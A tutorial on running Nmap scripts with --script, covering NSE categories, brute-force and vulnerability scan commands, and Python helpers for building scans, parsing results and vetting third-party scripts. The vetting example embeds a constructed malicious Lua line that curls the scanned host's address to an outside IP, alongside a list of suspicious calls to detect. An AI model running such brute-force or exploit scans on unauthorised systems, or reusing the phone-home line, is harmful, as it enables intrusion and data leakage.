How to Execute Scripts (`--script` Option) with Nmap

Learn how to execute Nmap scripts using the --script option.

Introduction

Nmap (Network Mapper) is a powerful and widely used network scanning tool that allows security professionals, administrators, and ethical hackers to discover hosts, services, and vulnerabilities on a network. One of its most powerful features is the ability to run scripts through the Nmap Scripting Engine (NSE) using the --script option.

NSE scripts can automate various tasks, including:

  • Service version detection
  • Vulnerability scanning
  • Network auditing
  • Exploit attempts and detection
  • Authentication bypass checks

This article will provide a comprehensive guide on how to execute scripts using the --script option in Nmap, including syntax, script categories, usage examples, and best practices.


Understanding the Nmap Scripting Engine (NSE)

The Nmap Scripting Engine (NSE) extends Nmap’s functionality by running scripts written in Lua. Scripts are grouped into categories by purpose; separately, each script declares a rule (prerule, hostrule, portrule or postrule) that decides at which stage of the scan it runs. The --script option selects scripts by name, by category, by wildcard, or by a boolean expression combining these.

Script Categories

  1. auth – Scripts that deal with authentication credentials (default or anonymous logins, credential bypasses); password guessing belongs in brute, not here.
  2. broadcast – Scripts that discover hosts not listed on the command line by broadcasting on the local network.
  3. brute – Scripts that guess credentials against authentication mechanisms; they are noisy and can lock accounts.
  4. default – Scripts run with -sC or -A (equivalent to --script=default).
  5. discovery – Scripts that gather additional information about the target.
  6. dos – Scripts that may cause a denial of service, deliberately or as a side effect.
  7. exploit – Scripts that actively exploit a vulnerability rather than merely test for it.
  8. external – Scripts that send data to third-party services (for example whois or reputation lookups), which discloses the target to that third party.
  9. fuzzer – Scripts that send unexpected or randomized input to a service.
  10. intrusive – The counterpart of safe: scripts that risk crashing services, consuming significant resources, or being seen as malicious by intrusion detection systems.
  11. malware – Scripts that test whether a host is infected with malware or backdoors.
  12. safe – Scripts designed not to crash services, exploit holes, or use large amounts of resources.
  13. version – Scripts that extend service version detection; they run only when -sV (or -A) is given.
  14. vuln – Scripts that check for specific known vulnerabilities and generally report only when one is found.

Each NSE script is stored in Nmap’s script directory (e.g., /usr/share/nmap/scripts/ on Linux and C:\Program Files (x86)\Nmap\scripts\ on Windows).


How to Use the --script Option

The --script option is used to specify one or more NSE scripts to run during a scan. The basic syntax is:

nmap --script <script-name> <target>

Running a Single Script

To run a single script, give its name (the .nse extension is optional). If you are unsure what a script does, nmap --script-help <name> prints its description and the arguments it accepts, and works for category names too:

nmap --script http-title scanme.nmap.org

This retrieves the title of the page served by each HTTP service found on scanme.nmap.org. The script only runs against ports that look like HTTP, so nothing is reported for a host with no web server.

Running Multiple Scripts

You can specify multiple scripts separated by commas:

nmap --script=ssl-heartbleed,http-title <target>

This runs both the ssl-heartbleed and http-title scripts.

Running Scripts by Category

Instead of specifying individual scripts, you can select every script in a category:

nmap --script=vuln <target>

This runs every script in the vuln category. Note that vuln is not a passive scan: some of its scripts are also tagged intrusive or exploit. Because Nmap evaluates --script as a boolean expression over names and categories, an expression such as "vuln and not intrusive" restricts the selection to the non-disruptive checks, and a wildcard such as "http-*" selects scripts by name prefix.

Running Scripts with Arguments

Some NSE scripts require or accept additional arguments. These are passed with --script-args as a comma-separated list of name=value pairs; a value containing commas, braces, equals signs or whitespace must be quoted:

nmap --script http-brute --script-args userdb=users.txt,passdb=passwords.txt <target>

This performs an HTTP brute-force attack using the given user and password lists. The userdb and passdb arguments are read by the shared unpwdb library, so the same arguments work for every brute script; without them Nmap falls back to the lists bundled under nselib/data. Brute-force scripts are intrusive by nature, so expect log entries and possible account lockouts on the target.

Running All Default Scripts

Nmap’s -sC option (also implied by -A) is equivalent to --script=default:

nmap -sC <target>

This executes every script in the default category. It pairs well with -sV, since many default scripts decide whether to run based on the service identified on a port.
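As an added example (not code from this article or from the Nmap project), the following Python assembles the --script expression and --script-args described above into an argv list for subprocess, so the selection and quoting rules live in one place instead of being retyped per scan. The DISRUPTIVE exclusion list and all helper names are this example’s own choices; the NSE behaviour it relies on is that --script accepts boolean expressions over script names and categories, that --script-args values containing commas, braces, equals signs or whitespace must be quoted, and that version-category scripts need -sV.

```python
# Added example for this article (not part of Nmap): build the nmap command
# line for an NSE scan as an argv list, handling --script expressions and
# --script-args quoting explicitly.
import os
import shlex
import shutil
import subprocess
from typing import Dict, Iterable, List, Optional

# Categories whose scripts can crash services, lock accounts or trip IDS.
# "intrusive" already covers most of them; the rest are listed to be explicit.
DISRUPTIVE = ("intrusive", "dos", "exploit", "brute", "fuzzer")


def script_expression(selected: Iterable[str], allow_disruptive: bool = False) -> str:
    """Build one NSE selection expression from script names, wildcards or categories.

    Nmap evaluates --script as a boolean expression ("vuln and not intrusive"),
    so a category can be narrowed instead of being trusted wholesale.
    """
    names = [s.strip() for s in selected if s.strip()]
    if not names:
        raise ValueError("no scripts or categories selected")
    expr = " or ".join(names)
    if allow_disruptive:
        return expr
    return f"({expr}) and not ({' or '.join(DISRUPTIVE)})"


def script_args(args: Dict[str, str]) -> str:
    """Format --script-args as name=value pairs.

    NSE splits the list on commas and braces and each pair on '='; a value
    containing whitespace or any of , { } = must be quoted, and a quote inside
    a quoted value is escaped with a backslash.
    """
    parts = []
    for name, value in args.items():
        if any(c.isspace() or c in ",{}=" for c in value):
            value = '"' + value.replace('"', '\\"') + '"'
        parts.append(f"{name}={value}")
    return ",".join(parts)


def build_argv(target: str, selected: Iterable[str], args: Optional[Dict[str, str]] = None,
               allow_disruptive: bool = False, version_detect: bool = True,
               xml_out: Optional[str] = None) -> List[str]:
    """Return the nmap command as an argv list ready for subprocess.run()."""
    argv = ["nmap"]
    if version_detect:
        argv.append("-sV")  # version-category scripts only run with -sV
    argv.append("--script=" + script_expression(selected, allow_disruptive))
    if args:
        # Fail early on a missing wordlist instead of letting the script error out mid-scan.
        for name in ("userdb", "passdb"):
            if name in args and not os.path.isfile(args[name]):
                raise FileNotFoundError(f"{name}: wordlist {args[name]} does not exist")
        argv.append("--script-args=" + script_args(args))
    if xml_out:
        argv += ["-oX", xml_out]
    argv.append(target)
    return argv


def run(argv: List[str]) -> int:
    """Run the scan if nmap is installed; otherwise only show the command line."""
    print(shlex.join(argv))
    if shutil.which("nmap") is None:
        print("nmap not found in PATH; dry run only")
        return 0
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # Non-disruptive vulnerability checks plus the page title, results saved as XML.
    run(build_argv("192.168.1.1", ["vuln", "http-title"], xml_out="scan.xml"))
```

Run as a script it prints the command it would execute and only invokes nmap when the binary is on the PATH; pass allow_disruptive=True when you genuinely intend to run brute, dos or exploit scripts against a target you are authorized to test.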


Practical Examples

1. Discovering HTTP Server Titles

nmap --script http-title 192.168.1.1

This retrieves the title of web pages hosted on 192.168.1.1.

2. Detecting SSL Vulnerabilities

nmap --script ssl-enum-ciphers 192.168.1.1

This enumerates the protocol versions and cipher suites each TLS service offers, grades every cipher from A (strong) to F (broken), and reports the weakest as "least strength"; a C or worse usually warrants a finding.

3. Checking for Open Ports and Services

nmap -sV --script=version <target>

This runs service version detection together with the scripts in the version category. Those scripts only execute when -sV (or -A) is present, so --script=version on its own would do nothing.

4. Brute-Forcing FTP Authentication

nmap --script ftp-brute --script-args userdb=users.txt,passdb=passwords.txt 192.168.1.1

This attempts to brute-force the FTP login with the supplied lists. Like every brute script it is intrusive: it generates many failed logins, which will appear in the target’s logs and may lock accounts, so run it only with explicit authorization.

5. Running All Vulnerability Scripts

nmap --script=vuln 192.168.1.1

This executes all scripts that check for vulnerabilities.
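The examples above print their findings to the terminal. In practice you save the scan with -oX and post-process it, so here, as an added example that is not Nmap’s code, is a Python reader for NSE results in that XML. SAMPLE_XML is constructed for this example and trimmed to the elements that matter; a real file carries more attributes but the same host/port/script nesting, and the per-cipher letter grades and the "least strength" element are what ssl-enum-ciphers emits.

```python
# Added example for this article (not Nmap's own code): extract NSE script
# results from nmap -oX output and turn the ssl-enum-ciphers grades into
# findings. SAMPLE_XML is constructed to mirror Nmap's layout.
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script http-title,ssl-enum-ciphers -oX scan.xml 192.168.1.1">
  <host>
    <address addr="192.168.1.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/>
        <script id="http-title" output="Router admin">
          <elem key="title">Router admin</elem>
        </script>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="http" tunnel="ssl" product="nginx" version="1.18.0"/>
        <script id="ssl-enum-ciphers" output="see structured output">
          <table key="TLSv1.0">
            <table key="ciphers">
              <table>
                <elem key="name">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>
                <elem key="strength">C</elem>
              </table>
            </table>
          </table>
          <table key="TLSv1.2">
            <table key="ciphers">
              <table>
                <elem key="name">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</elem>
                <elem key="strength">A</elem>
              </table>
            </table>
          </table>
          <elem key="least strength">C</elem>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""

GRADES = "ABCDEF"  # ssl-enum-ciphers letter grades, best to worst


def script_results(xml_text: str) -> List[Dict]:
    """Flatten every per-port <script> element into a row (host, port, id, output, element)."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                rows.append({"host": ip, "port": int(port.get("portid")), "id": script.get("id"),
                             "output": script.get("output"), "elem": script})
    return rows


def least_strength(script: ET.Element) -> Optional[str]:
    """The overall grade ssl-enum-ciphers assigns to the port."""
    return script.findtext("elem[@key='least strength']")


def weak_ciphers(script: ET.Element, threshold: str = "B") -> List[Tuple[str, str, str]]:
    """(protocol, cipher, grade) for every cipher graded worse than threshold."""
    weak = []
    for proto in script.findall("table"):  # one table per protocol version
        for cipher in proto.findall("table[@key='ciphers']/table"):
            name = cipher.findtext("elem[@key='name']")
            grade = cipher.findtext("elem[@key='strength']")
            if name and grade and GRADES.index(grade) > GRADES.index(threshold):
                weak.append((proto.get("key"), name, grade))
    return weak


def summarize(xml_text: str) -> Dict[str, List[str]]:
    """One finding per line, keyed by host:port, ready for a report."""
    findings: Dict[str, List[str]] = {}
    for row in script_results(xml_text):
        lines = findings.setdefault(f"{row['host']}:{row['port']}", [])
        if row["id"] == "http-title":
            title = row["elem"].findtext("elem[@key='title']")
            lines.append(f"title: {title}")
        elif row["id"] == "ssl-enum-ciphers":
            lines.append(f"least strength: {least_strength(row['elem'])}")
            for proto, name, grade in weak_ciphers(row["elem"]):
                lines.append(f"weak cipher {name} ({proto}, grade {grade})")
    return findings


if __name__ == "__main__":
    for key, lines in summarize(SAMPLE_XML).items():
        print(key, *lines, sep="\n  ")
```

Host-level scripts (prerule/hostrule scripts) appear under a <hostscript> element rather than under a <port> and can be collected the same way; the structured <elem>/<table> output is what to parse, since the free-text output attribute changes between script versions.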


Managing and Updating NSE Scripts

New and updated scripts arrive with Nmap releases (or by fetching the scripts directory from the Nmap source repository), so keeping NSE current means keeping Nmap current. After adding, removing or editing scripts in the scripts directory, rebuild the index:

nmap --script-updatedb

This does not download anything. It regenerates the script.db index from the .nse files present in the scripts directory, which is what category and wildcard selection (for example --script=vuln) consult; since that directory is normally root-owned, the command usually needs to run as root.

Locating NSE Scripts

To find the installed scripts on Linux, quote the pattern so the shell does not expand it against the current directory (locate reads its own index, so run updatedb first if it returns nothing):

locate '*.nse'

On Windows, use:

dir /B "C:\Program Files (x86)\Nmap\scripts"

Downloading and Installing Custom Scripts

If you find a third-party NSE script online, you can install it manually. A script does not have to live in the scripts directory: --script also accepts a path to a .nse file, which lets you test it before installing it.

  1. Download the script and read it. It is Lua source that will run with Nmap’s privileges (usually root), so check which hosts it contacts, whether it writes files or shells out, and whether its declared categories match what it actually does.

  2. Copy it into the Nmap scripts directory.

  3. Rebuild the script index so that category and wildcard selection can find it:

    nmap --script-updatedb
    
  4. Execute the script:

    nmap --script <script-name> <target>
    
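A grep-level pre-flight check to run on a downloaded .nse file before copying it into the scripts directory, as an added example that is not part of Nmap: it parses the declarations every NSE script carries (author, license, categories, rule, action) and flags Lua calls a scanning script rarely needs. SAMPLE_SCRIPT is constructed for this example (a fictional banner grabber that phones home through os.execute); SUSPICIOUS_CALLS is this example’s own heuristic list, not an Nmap rule, and a clean result is no substitute for reading the script.

```python
# Added example for this article, not part of Nmap: static checks on a
# third-party NSE script before installing it. NSE scripts are plain Lua that
# runs with nmap's privileges, so treat them like any code you run as root.
# SAMPLE_SCRIPT is constructed; the call list is a heuristic.
import re
from typing import Dict, List, Tuple

SAMPLE_SCRIPT = r'''description = [[
Grabs a banner from a hypothetical service. Constructed for this example.
]]
author = "example"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

local comm = require "comm"
local shortport = require "shortport"

portrule = shortport.port_or_service(8080, "http-alt")

action = function(host, port)
  -- a banner grabber has no business shelling out or phoning home
  os.execute("curl -s http://203.0.113.9/seen?" .. host.ip)
  local status, result = comm.exchange(host, port, "HELLO\r\n")
  if not status then return nil end
  return result
end
'''

# Lua calls a scanning script rarely needs; every hit deserves a manual look.
SUSPICIOUS_CALLS = ("os.execute", "io.popen", "io.open", "os.remove", "os.rename",
                    "package.loadlib", "loadstring", "load", "dofile")
DISRUPTIVE = {"intrusive", "dos", "exploit", "brute", "fuzzer"}
RULES = ("prerule", "hostrule", "portrule", "postrule")


def parse_metadata(source: str) -> Dict:
    """Pull the declarations every NSE script carries."""
    def scalar(name: str):
        m = re.search(rf'^\s*{name}\s*=\s*"([^"]*)"', source, re.M)
        return m.group(1) if m else None

    cats = re.search(r"^\s*categories\s*=\s*\{([^}]*)\}", source, re.M)
    categories = re.findall(r"[\"']([^\"']+)[\"']", cats.group(1)) if cats else []
    rules = [r for r in RULES if re.search(rf"^\s*{r}\s*=", source, re.M)]
    return {"author": scalar("author"), "license": scalar("license"),
            "categories": categories, "rules": rules,
            "has_action": bool(re.search(r"^\s*action\s*=", source, re.M))}


def suspicious_calls(source: str) -> List[Tuple[int, str]]:
    """(line number, call) for every suspicious Lua call outside a comment."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = line.split("--", 1)[0]  # drop trailing Lua comments
        for call in SUSPICIOUS_CALLS:
            if re.search(r"\b" + re.escape(call) + r"\s*\(", code):
                hits.append((lineno, call))
    return hits


def vet(source: str) -> List[str]:
    """Human-readable findings; an empty list means nothing obvious stood out."""
    meta = parse_metadata(source)
    findings = []
    if not meta["has_action"] or not meta["rules"]:
        findings.append("no action/rule declared: not a runnable NSE script")
    if not meta["categories"]:
        findings.append("no categories: the script only runs when named explicitly")
    disruptive = sorted(DISRUPTIVE & set(meta["categories"]))
    if disruptive:
        findings.append("disruptive categories: " + ", ".join(disruptive))
        if "safe" in meta["categories"]:
            findings.append("claims 'safe' alongside a disruptive category; distrust the label")
    if meta["author"] is None or meta["license"] is None:
        findings.append("missing author or license declaration")
    for lineno, call in suspicious_calls(source):
        findings.append(f"line {lineno}: calls {call}(); confirm why a scan script needs it")
    return findings


if __name__ == "__main__":
    for finding in vet(SAMPLE_SCRIPT):
        print(finding)
```

On the constructed sample the metadata looks legitimate (a safe discovery script with a portrule and an action), and only the line-level check exposes the os.execute call that sends the target’s address to an outside host; that is exactly the kind of thing a category label will never tell you.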

Best Practices

  1. Use NSE Scripts Responsibly – Scripts in the intrusive, brute, dos and exploit categories can crash services, lock accounts and trigger security alarms; select them deliberately (for example with "vuln and not intrusive") rather than by running a whole category.
  2. Verify Scripts Before Running – Third-party scripts are Lua code executed with Nmap’s privileges, usually root; read them before installing, and check that their declared categories match their behaviour.
  3. Avoid Overloading the Network – Running many aggressive scripts in parallel can slow or disrupt the network; tune timing and run against small target sets first.
  4. Update Nmap Regularly – New vulnerability checks ship with Nmap releases; --script-updatedb only rebuilds the local index and does not fetch anything.
  5. Test in a Controlled Environment – Run potentially harmful scripts in a lab before using them against production systems, and only ever with written authorization.

Conclusion

The --script option in Nmap provides powerful automation capabilities for network scanning and security assessments. By leveraging the Nmap Scripting Engine, users can perform in-depth vulnerability scanning, brute-force testing, service detection, and more. Understanding how to execute, manage, and update NSE scripts ensures that your network reconnaissance is effective, efficient, and secure.

By following best practices, you can maximize the benefits of NSE while minimizing potential risks. Whether you are an ethical hacker, network administrator, or security researcher, mastering the --script option in Nmap is an essential skill for advanced network analysis.